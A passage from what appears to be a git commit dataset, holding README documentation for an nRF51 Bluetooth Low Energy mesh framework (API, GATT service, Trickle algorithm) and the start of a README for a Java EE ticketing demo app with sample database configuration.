options=\"header\"]\n.Metadata Characteristic Structure\n|===\n|Value | Position | Size | Description\n\n|Access Address | 0 | 4 bytes | The Access address the mesh operates on. \n|Advertisement interval | 4 | 4 bytes | The minimum advertisement interval each value\nis broadcasted with, in milliseconds.\n|Value count | 8 | 1 byte | The amount of available value slots on the node\n|Channel | 9 | 1 byte | The BLE channel the mesh operates on\n|===\n\n\n\n=== Trickle Algorithm\nThe Trickle Algorithm was first presented by P. Levis of Stanford University\nand T. Clausen of LIX, Ecole Polytechnique in March 2010, and has since seen\nseveral revisions until it was published as RFC6206 in March 2011. The Trickle\nAlgorithm provides a method of controlled packet flooding across a mesh of\nlow-power lossy network nodes, by letting the nodes dynamically decide when to\nbroadcast their values based on network activity and when the last update to\nstate values arrived. \n\n==== A brief overview\nThe algorithm operates in exponentially growing time intervals of size I, starting at\ninterval size Imin, growing up to Imax. During an interval, it registers all\nincoming messages, where each message may be either consistent or inconsistent\nwith the node's current state (the definition of consistency is left for the \nuser to decide). For each consistent message, a counter value, C, is increased\nby one, and for each inconsistent message, if the interval size I is larger\nthan Imin, the interval timer is reset, and I is set to Imin. At the start of\neach interval, a timer T is set for a random time in the range `[I\/2, I)`. When\nthis timer expires, the node shall broadcast its state if the consistent\nmessage counter C is less than some redundancy constant K. At the end of each\ninterval, the interval length (I) is doubled if `I * 2 < Imax`, and C is reset.
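\n\nThe interval mechanics described above can be summarized in the following sketch (simplified pseudo-C; the `trickle_t` type, the helpers and the constant `K` are illustrative, not the framework's internal implementation):\n\n[source,c]\n----\n#define K 3 \/* redundancy constant, illustrative value *\/\n\ntypedef struct\n{\n uint32_t i_min, i_max; \/* Imin and Imax *\/\n uint32_t i; \/* current interval size I *\/\n uint32_t t; \/* broadcast timer T *\/\n uint8_t c; \/* consistency counter C *\/\n} trickle_t;\n\nstatic void interval_start(trickle_t* t)\n{\n t->c = 0;\n t->t = random_in_range(t->i \/ 2, t->i); \/* T in [I\/2, I) *\/\n}\n\nvoid trickle_rx_consistent(trickle_t* t) { t->c++; }\n\nvoid trickle_rx_inconsistent(trickle_t* t)\n{\n if (t->i > t->i_min)\n {\n t->i = t->i_min; \/* fall back to the minimum interval *\/\n interval_start(t);\n }\n}\n\nvoid trickle_timer_t_fired(trickle_t* t)\n{\n if (t->c < K) \/* stay silent if enough consistent traffic was heard *\/\n {\n broadcast_state(t);\n }\n}\n\nvoid trickle_interval_end(trickle_t* t)\n{\n if (t->i * 2 < t->i_max) \/* grow the interval exponentially, up to Imax *\/\n {\n t->i *= 2;\n }\n interval_start(t);\n}\n----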
\n\nThe exponential growth and inconsistency reset functionality allows the nodes\nin the network to grow exponentially more silent as the state remains\nunchanged, but still stay responsive as new information arrives. The\nconsistency counter C and redundancy constant K allow the system to\ndynamically adjust to network density, as nodes will choose not to transmit if\nthey've heard the same message from other nodes several times.\n\n==== Usage in the framework\nThe framework provides one instance of the Trickle Algorithm for each handle-value pair (dubbed a Trickle instance). This means that when one value is frequently updated, while another\none remains unchanged, the node only rebroadcasts the active value frequently,\nkeeping the interval times for the static value high. Each handle-value pair\nalso comes with a version number, which increases by one for each fresh write\nto a value. This version number, along with a checksum, allows the framework to\ndistinguish value consistency. If the node receives a value update with a\nhigher version number than its own, it automatically overwrites the\ncontents of the value data and notifies the user. Any inconsistency in\nversion number or checksum results in a reset of interval timing for the value\nin question.\n\n==== Weaknesses in algorithm and implementation\nWhile the algorithm in its intended form provides a rather robust and\neffective packet propagation scheme, some necessary adjustments introduce a\nfew weaknesses. First off, using several instances of the algorithm on the same\nset of nodes yields a growth in on-air collisions and poorer frequency\nutilization control, as the individual instances take no consideration of\nthe others' activity. This means that the scheme doesn't scale that well with\nseveral handle-value pairs, and the user is asked to consider this during\nimplementation. The choice of separate trickle instances is, however, a\nresult of a tradeoff: if the entire node state shared one trickle instance, the\nentire state would be rebroadcasted each time a part of it is updated,\nand the amount of shareable data would be severely limited by packet size and\npacket chaining possibilities.\n\nAnother weakness in the adaptation is caused by the fact that the Softdevice Timeslot API\nwon't let the framework get free access to the radio at all times, resulting in\nreduced on-air time for mesh-related operations. When the\nSoftdevice operates in an advertising state, this problem only has an impact of\n5-25% reduction in potential on-air time for mesh operations, but in a\nconnected state with a short connection interval, the Softdevice may reduce\ntimeslots by as much as 80%. This results in a lot of missed packets to the\naffected node, and may dramatically increase propagation time to this\nnode.
\n\n=== Timeslots\nThe framework does all mesh-related transmissions in timeslots granted by the\nSoftdevice Multiprotocol Timeslot API, operating directly on the radio hardware\nmodule. Timeslots are primarily allocated by extending short timeslots into\ntimeslots of up to 1 second, and the framework will attempt to seize the radio \nfor as much time as the Softdevice will allow. At the beginning of each timeslot, \nthe framework samples the RTC0 Low Frequency Timer, and checks whether any \ntimers related to the Trickle Algorithm have expired since the end of the \nprevious timeslot. If this is the case, the framework does all pending \noperations immediately. After this initial \"catch up\" operation, the framework \nhandles all operations as they appear for the remainder of the timeslot.\n\nFor details about the Softdevice Multiprotocol Timeslot API, please refer to the\nSoftdevice Specification, available on the Nordic Semiconductor homepage.\n\n=== Air interface packets\nAll Mesh-related packets are broadcasted as regular BLE Nonconnectable\nAdvertisements, with a few differences: the Access address is set by the user,\nand does not have to match the Bluetooth Specification advertisement access\naddress. In addition, the Advertisement Address (GAP address) field provided after\nthe packet header does not necessarily contain the Advertisement Address of\nthe node broadcasting the message, but rather the address of the mesh node at\nwhich the indicated version of the handle-value pair first appeared. The\npacket structure is illustrated below.\n\nimage::docs\/packet_format.png[Packet format on air]\n\n=== Resource allocation\nThe framework takes control over several hardware and software resources,\nmaking these unavailable to applications:\n\n* *Timeslot API* All callbacks for timeslot sessions are held by the framework.\n\n* *SWI0_IRQ* The software interrupt is used for asynchronous packet processing.\n\n* *NRF_TIMER0* HF timer 0 is reset and started by the Timeslot API at the\nbeginning of each timeslot, and all capture compare slots for this timer may be\nin use at any time.\n\n* *NRF_RTC0* The Timeslot API uses RTC0 for timing, and manipulating this\nmodule will lead to undefined behavior or hardfaults in the Softdevice.\n\n* *NRF_PPI, channels 8-12* The framework uses PPI channels 8-12 for radio\noperation during timeslots, and the Softdevice may use channels 8+ outside them. Only\nchannels 0-7 are safely available to the application (just as with regular\n Softdevice applications).\n\nIn addition, the Softdevice may block some hardware blocks not listed here.\nPlease refer to the relevant Softdevice Specification for details (available at\nthe Nordic Semiconductor homepage).\n\n==== Memory\nThe framework allocates a metadata array on the heap, with 36 bytes per\nhandle-value pair. The rest of the program operates strictly on the stack, and\ncompiled at Optimization level -O0, Keil reports a program size of approx.\n10kB and a stack size of 5.5kB for the Template project under `examples\/`.\n\n== Why this was made\nThis project is created in collaboration with The Norwegian University of \nScience and Technology (NTNU), as part of a master thesis.
\n\n== Forum\nhttp:\/\/devzone.nordicsemi.com\/[Nordic Developer Zone]\n\n== Resources\nhttp:\/\/www.nordicsemi.com[Nordic Semiconductor Homepage] \n\nhttp:\/\/tools.ietf.org\/html\/rfc6206[Trickle Algorithm Specification]\n\n\n","old_contents":"= nRF51-ble-broadcast-mesh\n\nBluetooth Low Energy based Rebroadcasting mesh implementation on the nRF51.\nWorks with Softdevice S110 v7.x with Timeslot API.\nOffers an API for implementing your own mesh enabled application, operating\nconcurrently with regular BLE applications.\n\n== Usage\nIn addition to two provided examples, there is a template project under\n_examples\/_. This may be used as a basis for your own applications, or you\ncould choose to do it yourself from scratch. In theory, the framework should be\ncompatible with most Softdevice based projects, but some restrictions to\nhardware and software modules apply, see <<resource-allocation>> for details.\nThe framework adds a Mesh GATT service to the Softdevice GATT server which\ncontain all mesh-global states. This service may be accessed by external nodes,\njust as any other GATT service, through a connection established via the\nSoftdevice. See section <<gatt-service>> for details about structure and\naccess. \n\n== Basic concepts\n\nA rebroadcasting mesh network works by flooding all messages to all nodes \nin the network through broadcasts. Each time a device receives a broadcast\nmessage from some other device in the mesh, it repeats the message, or \n_rebroadcasts_ it, letting its neighbors hear the new message. \nThe neighbors rebroadcast the message to their neighbors, and the process\nis repeated until all devices in the mesh have received the message. This \nlets wireless devices talk to eachother without being within direct radio \nrange, as devices between them help relaying the messages.\n\nThe Rebroadcasting Mesh framework (hereby referred to as \"the framework\" or\nrbc_mesh) provides a connection-less, rebroadcasting infrastructure for\nsynchronizing states across a set of BLE enabled nodes. All nodes receive all\nmessages that are transmitted within their range, and any node may update the\nmesh-global states. There is no hierarchy, and no directed data links. \n\nThe framework resides on top of the nRF51 Softdevice, utilizing the Timeslot\nAPI to allocate radio time. The framework will attempt to allocate as much time\nas possible, in order to listen for other nodes' messages.\n\nAll nodes in the mesh share a set of indexed dataslots. The data contained at each\nindex is propagated through the mesh with version numbers, with the objective of \nsynchronizing the same version of the data across all nodes in the mesh. Each \ntime a node overwrites a value, it increments the version number, and all nodes \nthat receive a broadcast message with a version number that is higher than the \none in its database, will adapt this new version of the value. \n\nThe value propagation is controlled by an implementation of the IETF RFC6206\n\"Trickle\", a flood control algorithm for lossy, low power networks. The Trickle\nalgorithm dynamically decides intervals at which a value will be broadcasted by\na node, based on how many consistent messages the node picks up, and when the last\nupdate to the state it manages was. 
The Trickle algorithm dynamically adapts to\nnode density and value update frequency.\n\nThe framework provides each handle-value pair with one Trickle-instance (an\nisolated version of the algorithm), and utilizes the Softdevice GATT server\nstructure to store the values. All values are stored as characteristics within\none \"Mesh\"-GATT Service, which is accessible to external nodes through a\nclassic BLE Softdevice connection, implemented in application space. The \"BLE\nGateway example\" displays a way to achieve such behavior.\n\n== Structure\nThe project is split into two parts: _rbc_mesh\/_ (the framework), and a folder with\nexamples. The framework is interfaced through a set of API functions,\nexclusively contained in the _rbc_mesh.h_ file. \n\nimage::docs\/architecture.png[Framework modules]\n\n=== Framework Modules\nThe framework is split into several separate modules, each of which is\nresponsible for managing various aspects of the framework.\n\n* *rbc_mesh* The top module of the framework, contains all API functions and is\nthe only module that should be accessed by the application.\n\n* *mesh_srv* The value storage module, communicates with the Softdevice's GATT\nserver, and maps all handles to GATT characteristics.\n\n* *timeslot_handler* A module communicating with and abstracting the nRF51\nSoftdevice Timeslot API and manages the two interrupt contexts the framework\nruns in.\n\n* *trickle* Implementation of the IETF RFC6206 \"Trickle\" algorithm for\nmesh-global state propagation.\n\n* *transport_control* Lower level packet handler. Abstracts the radio interface and\npacket format for the mesh_srv-module. \n\n* *radio_control* Asynchronous radio abstraction. Offers a way for higher level\nmodules to queue radio events and packets, and also provides callbacks on\nvarious radio events.\n\n* *timer_control* Interfaces the NRF_TIMER0 hardware module by managing timer\ncapture allocations and callbacks. Tightly integrated with the radio module.\n\n=== API\n\nThe API is exclusively contained in the _rbc_mesh.h_ file in _rbc_mesh\/_, and\nwhile the other framework files need to be included in the build process or\nKeil project, they should not be interfaced directly. Note that all API\nfunctions except the getters for metadata calls Softdevice SVC functions, and\nconsequently, all use of the API must happen in interrupt context APP_LOW or MAIN. \nThe framework event callback function runs in priority 3 (APP_LOW), and it is\nsafe to use the API from this context.\n\n==== The API provides the following functions to the user:\n\n*Initialize framework*\n[source,c]\n----\nuint32_t rbc_mesh_init(uint32_t access_addr, \n uint8_t channel, \n uint8_t handle_count, \n uint8_t adv_int_ms); \n----\nThis function must be called before any other framework function, and sets up\nthe Mesh GATT service and enables listening for incoming mesh messages.\n\nAll nodes within the same mesh network must be set up with the same access\naddress and channel, but handle_count and adv_int_ms may be different. \n\n'''\n\n*Manually enable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_enable(uint8_t handle);\n----\nStart broadcasting the indicated value to other nodes, without updating the\ncontents of the value. If the handle-value pair has never been used before, the\nframework forces the node to broadcast an empty version 0-message to\nother nodes, which, in turn will answer with their version of the\nhandle-value-pair. 
This way, new nodes may get up to date with the rest of the\nnodes in the mesh.\n\n'''\n\n*Disable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_disable(uint8_t handle);\n----\nStop broadcasting the indicated handle-value pair. Note that the framework will\nkeep updating the local version of the variable when external nodes write to\nit, and consequently notify the application about the update as usual. The\nframework will not, however, rebroadcast the value to other nodes, but rather\ntake a passive role in the mesh for this handle-value pair.\n\n'''\n\n*Update value*\n[source,c]\n----\nuint32_t rbc_mesh_value_set(uint8_t handle, uint8_t* data, uint16_t len);\n----\nUpdate the value represented by the given handle. This will bump the version\nnumber on the handle-value pair, and broadcast this new version to the rest of\nthe nodes in the mesh. \n\nThe `data` array may at most be 28 bytes long, and an error will be returned if\nthe len parameter exceeds this limitation.\n\n'''\n\n*Get value*\n[source,c]\n----\nuint32_t rbc_mesh_value_get(uint8_t handle, \n uint8_t* data, \n uint16_t* len,\n ble_gap_addr_t* origin_addr);\n----\nReturns the most recent value paired with this handle. The `data` buffer must\nbe at least 28 bytes long in order to ensure memory safe behavior. The actual\nlength of the data is returned in the `length` parameter. The `origin_addr`\nparameter returns the address of the node that first started broadcasting the\ncurrent version of the message.\n\n'''\n\n*Get operational access address*\n[source,c]\n----\nuint32_t rbc_mesh_access_address_get(uint32_t* access_address);\n----\nReturns the access address specified in the initialization function in the\n`access_address` parameter.\n\n'''\n\n*Get operational channel*\n[source,c]\n----\nuint32_t rbc_mesh_channel_get(uint8_t* channel);\n----\nReturns the channel specified in the initialization function in the\n`channel` parameter.\n\n'''\n\n*Get handle count*\n[source,c]\n----\nuint32_t rbc_mesh_handle_count_get(uint8_t* handle_count);\n----\nReturns the handle count specified in the initialization function in the\n`handle_count` parameter. \n\n'''\n\n*Get minimum advertisement interval*\n[source,c]\n----\nuint32_t rbc_mesh_adv_int_get(uint32_t* adv_int_ms);\n----\nReturns the minimum advertisement interval specified in the initialization\nfunction in the `adv_int_ms` parameter. \n\n'''\n\n*BLE event handler*\n[source,c]\n----\nuint32_t rbc_mesh_ble_evt_handler(ble_evt_t* evt);\n----\nSoftdevice BLE event handler. Must be called by the application if the\nsoftdevice function `sd_ble_evt_get()` returns a new event. This will update\nversion numbers and transmit data if any of the value-characteristics in the\nmesh service has been written to through an external softdevice connection. May\nbe omitted if the application never uses any external connections through the\nsoftdevice.\n\n'''\n\n*Softdevice event handler*\n[source,c]\n----\nuint32_t rbc_mesh_sd_irq_handler(void);\n----\nHandles and consumes any pure softdevice events (excluding softdevice BLE\n events. See the official\n https:\/\/devzone.nordicsemi.com\/docs\/[Softdevice documentation] for\n details). Should be called on each call to `SD_IRQHandler()`.\n\n==== Return values\nAll API functions return a 32bit status code, as defined by the nRF51 SDK. 
All \nfunctions will return `NRF_SUCCESS` upon successful completion, and all\nfunctions except the `rbc_mesh_init()` function return\n`NRF_ERROR_INVALID_STATE` if the framework has not been initialized. All\npossible return codes for the individual API functions (and their meaning)\nare defined in the `rbc_mesh.h` file. \n\n==== Framework events\nIn addition to the provided API functions, the framework provides an event\nqueue for the application. These events are generated in the framework and\nshould be handled by the application in an implementation of the\n`rbc_mesh_event_handler()` function defined in _rbc_mesh.h_. The events come in\nthe shape of `rbc_mesh_event_t*` structs, with an event type, a handle number,\n a data array and an originator address.\n\nThe framework may produce the following events:\n\n* *Update*: The value addressed by the given handle has been updated from an\nexternal node with the given address, and now contains the data array\nprovided in the event-structure.\n\n* *Conflicting*: A value with the same version number, but different data or\noriginator has arrived at the node, and this new, conflicting value is provided\nwithin the event-structure. The value is *not* overwritten in the database, but\nthe application is free to do this with a call to `rbc_mesh_value_set()`.\n\n* *New*: The node has received an update to the indicated handle-value pair,\nwhich was not previously active.\n\n=== Examples\n\nThe project contains two simple examples and one template project. The two\nexamples are designed to operate together, and show off an extremely simple\nexample scenario where two handle-value pairs decides the state of the two LEDs\non the nRF51 evkit (or red and green LED on the nRF51 dongle). The examples\nhave been tested with boards PCA10000, PCA10001, PCA10031 and PCA10003.\n\nThe template provides a basis for implementing your own applications with the\nframework, and addresses the different eventhandlers and initialization\nfunctions, without any additional functionality.\n\n==== LED Mesh example\nThis example reads the buttons on the nRF51 evkit boards, and sets the LEDs\naccordingly. It also broadcasts the state of the LEDs to the other nodes in the\nsame mesh, which will copy the state of the node that registered a button push.\nThis example can also be flashed to the nRF51 dongles (PCA10000 and PCA10031), \neven though these boards don't have any GPIO actions enabled. The dongle-nodes \nwill act as active slaves, copying and rebroadcasting the LED states of other \nnodes.\n\n==== BLE Gateway example\nThis example uses the same configuration for LEDs as the LED Mesh example, but\nprovides a S110 Softdevice profile for communication with external nodes in\nstead of a physical interface. The example application starts sending\nregular connectable BLE advertisements with the Softdevice, and displays the\nMesh service in its GATT server, so that external nodes may write to the two\nLED config values as if they were regular characteristics. \n\n== How it works\n=== GATT Service\nAll values are stored as separate characteristics in the Softdevice GATT server. These\ncharacteristics are all contained within one \"Mesh\" GATT service, along with\none metadata characteristic containing information about the state of the mesh.\n\nThe GATT service and characteristics operate with their own 128 bit base UUID,\nwith the same base. 
\n=== Examples\n\nThe project contains two simple examples and one template project. The two\nexamples are designed to operate together, and show off an extremely simple\nexample scenario where two handle-value pairs decide the state of the two LEDs\non the nRF51 evkit (or the red and green LEDs on the nRF51 dongle). The examples\nhave been tested with boards PCA10000, PCA10001, PCA10031 and PCA10003.\n\nThe template provides a basis for implementing your own applications with the\nframework, and addresses the different event handlers and initialization\nfunctions, without any additional functionality.\n\n==== LED Mesh example\nThis example reads the buttons on the nRF51 evkit boards, and sets the LEDs\naccordingly. It also broadcasts the state of the LEDs to the other nodes in the\nsame mesh, which will copy the state of the node that registered a button push.\nThis example can also be flashed to the nRF51 dongles (PCA10000 and PCA10031), \neven though these boards don't have any GPIO actions enabled. The dongle-nodes \nwill act as active slaves, copying and rebroadcasting the LED states of other \nnodes.\n\n==== BLE Gateway example\nThis example uses the same configuration for LEDs as the LED Mesh example, but\nprovides an S110 Softdevice profile for communication with external nodes\ninstead of a physical interface. The example application starts sending\nregular connectable BLE advertisements with the Softdevice, and displays the\nMesh service in its GATT server, so that external nodes may write to the two\nLED config values as if they were regular characteristics. \n\n== How it works\n=== GATT Service\nAll values are stored as separate characteristics in the Softdevice GATT server. These\ncharacteristics are all contained within one \"Mesh\" GATT service, along with\none metadata characteristic containing information about the state of the mesh.\n\nThe GATT service and characteristics operate with their own 128-bit base UUID,\nshared across all of them. \n\n.Assigned UUIDs\n|===\n|Value | UUID \n\n|Mesh service | 0x2A1E0001-FD51-D882-8BA8-B98C0000CD1E\n|Mesh metadata characteristic | 0x2A1E0002-FD51-D882-8BA8-B98C0000CD1E\n|Mesh value characteristic | 0x2A1E0003-FD51-D882-8BA8-B98C0000CD1E\n|===\n\n==== Mesh values\nThe Mesh value characteristics are the states that will be shared across the\nmesh. Each Mesh value may contain up to 28 bytes of data, and be updated from any\nnode in the mesh. \n\nThere may be up to 155 \"Mesh value\" characteristics in the mesh service in each\nnode, depending on configuration parameters provided to the `rbc_mesh_init()`\nfunction at runtime. Each mesh value operates with its own instance of\nthe Trickle algorithm, meaning that each is rebroadcast independently.\nThe handles addressing the values are stored as standard https:\/\/developer.bluetooth.org\/gatt\/Pages\/GattNamespaceDescriptors.aspx[Bluetooth SIG\nnamespace descriptors], where the enumeration of each value is used as\na mesh-global handle.\n\n_NOTE:_ Because the Bluetooth SIG has defined namespace descriptor 0 as\n\"unknown\", the handles start at 1, and trying to access handle 0 returns an\nNRF_ERROR_INVALID_ADDR error.\n\n==== Mesh metadata\nFor ease of use, the service also provides a Metadata characteristic, providing\nconfiguration parameters for the mesh. This metadata characteristic may be\nread by external nodes, and used for configuring new nodes that the user wishes\nto add to the mesh. The Metadata characteristic is structured as follows:\n\n[cols=\"3,1,1,6\", options=\"header\"]\n.Metadata Characteristic Structure\n|===\n|Value | Position | Size | Description\n\n|Access Address | 0 | 4 bytes | The access address the mesh operates on.\n|Advertisement interval | 4 | 4 bytes | The minimum advertisement interval each value\nis broadcast with, in milliseconds.\n|Value count | 8 | 1 byte | The number of available value slots on the node.\n|Channel | 9 | 1 byte | The BLE channel the mesh operates on.\n|===\n\n\n\n=== Trickle Algorithm\nThe Trickle Algorithm was first presented by P. Levis of Stanford University\nand T. Clausen of LIX, Ecole Polytechnique in March 2010, and has since seen\nseveral revisions until it was published as RFC6206 in March 2011. The Trickle\nAlgorithm provides a method of controlled packet flooding across a mesh of\nlow-power lossy network nodes, by letting the nodes dynamically decide when to\nbroadcast their values based on network activity and on when the last update to\nstate values arrived. \n\n==== A brief overview\nThe algorithm operates in exponentially growing time intervals of size I, starting at\ninterval size Imin, growing up to Imax. During an interval, it registers all\nincoming messages, where each message may be either consistent or inconsistent\nwith the node's current state (the definition of consistency is left for the \nuser to decide). For each consistent message, a counter value, C, is increased\nby one, and for each inconsistent message, if the interval size I is larger\nthan Imin, the interval timer is reset, and I is set to Imin. At the start of\neach interval, a timer T is set for a random time in the range `[I\/2, I)`. When\nthis timer expires, the node shall broadcast its state if the consistent\nmessage counter C is less than some redundancy constant K. At the end of each\ninterval, the interval length (I) is doubled if `I * 2 < Imax`, and C is reset.\n
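\nThe following is a compilable sketch of these interval rules, written for illustration only; it is not the framework's internal implementation, and the helper and type names are invented for the example:\n\n[source,c]\n----\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdlib.h>\n\n\/* One Trickle instance, following the rules described above. *\/\ntypedef struct\n{\n uint32_t i_min, i_max; \/* interval bounds Imin and Imax *\/\n uint32_t i; \/* current interval size I *\/\n uint32_t t; \/* broadcast timer T within the interval *\/\n uint32_t c; \/* consistent-message counter C *\/\n uint32_t k; \/* redundancy constant K *\/\n} trickle_t;\n\n\/* Start of an interval: reset C and pick T uniformly in [I\/2, I). *\/\nstatic void trickle_interval_begin(trickle_t* tr)\n{\n tr->c = 0;\n tr->t = tr->i \/ 2 + (uint32_t)(rand() % (tr->i \/ 2)); \/* assumes I >= 2 *\/\n}\n\n\/* Register an incoming message. *\/\nstatic void trickle_rx(trickle_t* tr, bool consistent)\n{\n if (consistent)\n {\n tr->c++;\n }\n else if (tr->i > tr->i_min)\n {\n tr->i = tr->i_min; \/* inconsistency: fall back to Imin... *\/\n trickle_interval_begin(tr); \/* ...and restart the interval timer *\/\n }\n}\n\n\/* When T expires: broadcast only if fewer than K consistent messages were heard. *\/\nstatic bool trickle_should_tx(const trickle_t* tr)\n{\n return tr->c < tr->k;\n}\n\n\/* End of an interval: double I (capped by Imax) and begin the next one. *\/\nstatic void trickle_interval_end(trickle_t* tr)\n{\n if (tr->i * 2 < tr->i_max)\n {\n tr->i *= 2;\n }\n trickle_interval_begin(tr);\n}\n----\n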
\nThe exponential growth and inconsistency reset functionality allows the nodes\nin the network to grow exponentially more silent as the state remains\nunchanged, while still staying responsive as new information arrives. The\nconsistency counter C and redundancy constant K allow the system to\ndynamically adjust to network density, as nodes will choose not to transmit if\nthey've heard the same message from other nodes several times.\n\n==== Usage in the framework\nThe framework provides one instance of the Trickle Algorithm for each handle-value\npair (dubbed a Trickle instance). This means that when one value is frequently updated, while another\none remains unchanged, the node only rebroadcasts the active value frequently,\nkeeping the interval times for the static value high. Each handle-value pair\nalso comes with a version number, which increases by one for each fresh write\nto a value. This version number, along with a checksum, allows the framework to\ndistinguish value consistency. If the node receives a value update with a\nhigher version number than its own, it will automatically overwrite the\ncontents of the value data and notify the user. Any inconsistency in both the\nversion number and the checksum results in a reset of the interval timing for the value\nin question. \n\n==== Weaknesses in algorithm and implementation\nWhile the algorithm in its intended form provides a rather robust and\neffective packet propagation scheme, some necessary adjustments introduce a\nfew weaknesses. First off, using several instances of the algorithm on the same\nset of nodes yields a growth in on-air collisions and poorer frequency\nutilization control, as the individual instances take no account of\nthe others' activity. This means that the scheme doesn't scale that well with\nseveral handle-value pairs, and the user is asked to consider this during\nimplementation. The choice of separate Trickle instances is, however, a\nresult of a tradeoff: if the entire node state shared one Trickle instance, the\nentire state would be rebroadcast each time a part of it is updated, \nand the amount of shareable data would be severely limited by packet size and\npacket chaining possibilities.\n\nAnother weakness in the adaptation is caused by the fact that the Softdevice Timeslot API\nwon't let the framework get free access to the radio at all times, resulting in\na reduced on-air time for mesh-related operations. When the\nSoftdevice operates in an advertising state, this problem only causes a\n5-25% reduction in potential on-air time for mesh operations, but in a\nconnected state with a short connection interval, the Softdevice may reduce\ntimeslots by as much as 80%. This results in a lot of missed packets to the\naffected node, and may dramatically increase propagation time to this\nnode. \n\n=== Timeslots\nThe framework does all mesh-related transmissions in timeslots granted by the\nSoftdevice Multiprotocol Timeslot API, operating directly on the radio hardware\nmodule. Timeslots are primarily allocated by extending short timeslots into\ntimeslots of up to 1 second, and the framework will attempt to seize the radio \nfor as much of the time as the Softdevice will allow. At the beginning of each timeslot, \nthe framework samples the RTC0 Low Frequency Timer, and checks whether any \ntimers related to the Trickle Algorithm have expired since the end of the \nprevious timeslot. 
If this is the case, the framework does all pending \noperations immediately. After this initial \"catch up\" operation, the framework \nhandles all operations as they appear for the remainder of the timeslot.\n\nFor details about the Softdevice Multiprotocol Timeslot API, please refer to the\nSoftdevice Specification, available on the Nordic Semiconductor homepage.\n\n=== Air interface packets\nAll mesh-related packets are broadcast as regular BLE Nonconnectable\nAdvertisements, with a few differences: the access address is set by the user,\nand does not have to match the Bluetooth Specification advertisement access\naddress. In addition, the Advertisement Address (GAP address) field provided after\nthe packet header does not necessarily contain the Advertisement Address of\nthe node broadcasting the message, but rather the address of the mesh node at\nwhich the indicated version of the value-handle pair first appeared. The\npacket structure is illustrated below.\n\nimage::docs\/packet_format.png[Packet format on air]\n\n=== Resource allocation\nThe framework takes control over several hardware and software resources,\nmaking these unavailable to applications:\n\n* *Timeslot API* All callbacks for timeslot sessions are held by the framework.\n\n* *SWI0_IRQ* The software interrupt is used for asynchronous packet processing.\n\n* *NRF_TIMER0* HF timer 0 is reset and started by the Timeslot API at the\nbeginning of each timeslot, and all capture compare slots for this timer may be\nin use at any time.\n\n* *NRF_RTC0* The Timeslot API uses RTC0 for timing, and manipulating this\nmodule will lead to undefined behavior or hardfaults in the Softdevice.\n\n* *NRF_PPI, channels 8-12* The framework uses PPI channels 8-12 for radio\noperation during timeslots, and the Softdevice may use channels 8+ outside them. Only\nchannels 0-7 are safely available to the application (just as with regular\nSoftdevice applications).\n\nIn addition, the Softdevice may block some hardware modules not listed here.\nPlease refer to the relevant Softdevice Specification for details (available at\nthe Nordic Semiconductor homepage).\n\n==== Memory\nThe framework allocates a metadata array on the heap, with 36 bytes per\nhandle-value pair. The rest of the program operates strictly on the stack, and\ncompiled at optimization level -O0, Keil reports a program size of approx.\n10kB, and a stack size of 5.5kB for the Template project under `examples\/`.\n\n== Why this was made\nThis project was created in collaboration with the Norwegian University of \nScience and Technology (NTNU), as part of a master's thesis pre-study. \n\n== Forum\nhttp:\/\/devzone.nordicsemi.com\/[Nordic Developer Zone]\n\n== Resources\nhttp:\/\/www.nordicsemi.com[Nordic Semiconductor Homepage] \n\nhttp:\/\/tools.ietf.org\/html\/rfc6206[Trickle Algorithm Specification]\n\n\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d80882467ab625c5cabc391ca17d1e25c6532ceb","subject":"Better","message":"Better\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= TicketManor\n\nThis is a demo application showing how to build enterprise applications using Java EE. There are \na variety of APIs used, e.g., Java EE (JPA, EJB), Spring Framework, modern SPA Web (Angular, Ember.JS),\nand so on. 
Each major framework has its own subdirectory.\n\nIt will be used as a showcase in various courses offered by http:\/\/learningtree.com\/[Learning Tree],\nthe world leader in instructor-led technical training. Learning Tree offers courses in Java\nas well as many other enterprise technologies.\n\nLegal Note: We do _not_ intend this to be a passing-off of TicketMaster.com, which is a trademark in\nmost countries. It is just a demonstration of how certain parts of an enterprise app could\nbe implemented. WE ARE NOT ACTUALLY SELLING ANY TICKETS.\n\nThis site is *not* affiliated in any way with http:\/\/ticketmaster.com\/[TicketMaster(TM)] or any\nother commercial ticket-selling organization.\n\n== Building\n\nThe Java projects generally use Eclipse to write\/compile\/test code and Maven to build\/package.\nThe Android project uses Android Studio (based on IntelliJ IDEA) to write code\nand Gradle to compile\/test\/package.\n\nThe top-level Maven pom runs each of the other projects (including Android, through\na Maven plug-in that knows how to run Gradle).\n\n.*Build*\nimage:http:\/\/img.shields.io\/badge\/license-BSD2-green.svg[link=\"http:\/\/github.com\/LearningTree\/TicketManorJava\"]\nimage:https:\/\/img.shields.io\/badge\/maven-Built With-pink.svg[link=\"http:\/\/search.maven.org\/#search%7Cga%7C1%7Ca%3A%22darwinsys-api%22\"]\n\n== Deployment\n\nThe server projects are configured to deploy with the EE server WildFly 8+.\n\nYou MUST change the file ${WILDFLYHOME}\/standalone\/configuration\/standalone.xml AND standalone-full.xml to have\na datasource named TicketManorDataSource. For initial testing I just added:\n\n\t<datasource jndi-name=\"java:jboss\/datasources\/TicketManorDataSource\" pool-name=\"TicketManorPool\" \n\t\tenabled=\"true\" use-java-context=\"true\">\n\t\t<connection-url>jdbc:h2:mem:ticketmanor;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE<\/connection-url>\n\t\t<driver>h2<\/driver>\n\t\t<security>\n\t\t\t<user-name>sa<\/user-name>\n\t\t\t<password>sa<\/password>\n\t\t<\/security>\n\t<\/datasource>\n\nWe should someday change this to MySQL or a real database before deployment.\n\nN.B. Never give the production app unfettered access to the database;\nlimit it by doing something like this (commands are from PostgreSQL but\nwill be similar on other DB products):\n\n----\nwebsite=# create role myAppAcct login password 'siuojk21jsr';\nCREATE ROLE\nwebsite=# grant select,insert on someTable to myAppAcct;\nGRANT\nwebsite=# \n----\n\nYou might need a few other perms if JPA\/Hibernate is running in \"create\" or \"update\" mode,\nbut these modes should not really be used in production!\n\n== Naming Conventions\n\nIn the Java code:\n\n* *Bean means either a JSF-managed JavaBean or a Spring-managed JavaBean;\n* *Resource means 